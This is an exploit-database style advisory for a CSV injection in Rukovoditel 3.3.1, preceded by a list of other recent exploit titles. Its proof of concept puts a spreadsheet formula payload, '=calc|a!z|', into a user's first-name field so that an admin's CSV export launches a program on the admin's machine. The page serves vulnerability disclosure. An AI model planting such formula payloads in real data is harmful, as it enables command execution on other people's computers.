
13 changes to exploits/shellcodes/ghdb Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download Pydio Cells 4.1.2 - Server-Side Request Forgery Pydio Cells 4.1.2 - Unauthorised Role Assignments Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit) MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI) Faculty Evaluation System 1.0 - Unauthenticated File Upload Online Security Guards Hiring System 1.0 - Reflected XSS Online shopping system advanced 1.0 - Multiple Vulnerabilities Rukovoditel 3.3.1 - CSV injection SCRMS 2023-05-27 1.0 - Multiple SQL Injection Service Provider Management System v1.0 - SQL Injection Ulicms-2023.1-sniffing-vicuna - Privilege escalation unilogies/bumsys v1.0.3 beta - Unrestricted File Upload
19 lines
No EOL
669 B
Text
19 lines
No EOL
669 B
Text
Exploit Title: Rukovoditel 3.3.1 - CSV injection
|
|
Version: 3.3.1
|
|
Bugs: CSV Injection
|
|
Technology: PHP
|
|
Vendor URL: https://www.rukovoditel.net/
|
|
Software Link: https://www.rukovoditel.net/download.php
|
|
Date of found: 27-05-2023
|
|
Author: Mirabbas Ağalarov
|
|
Tested on: Linux
|
|
|
|
|
|
2. Technical Details & POC
|
|
========================================
|
|
Step 1. login as user
|
|
step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account )
|
|
step 3. Set Firstname as =calc|a!z|
|
|
step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1)
|
|
|
|
payload: =calc|a!z| |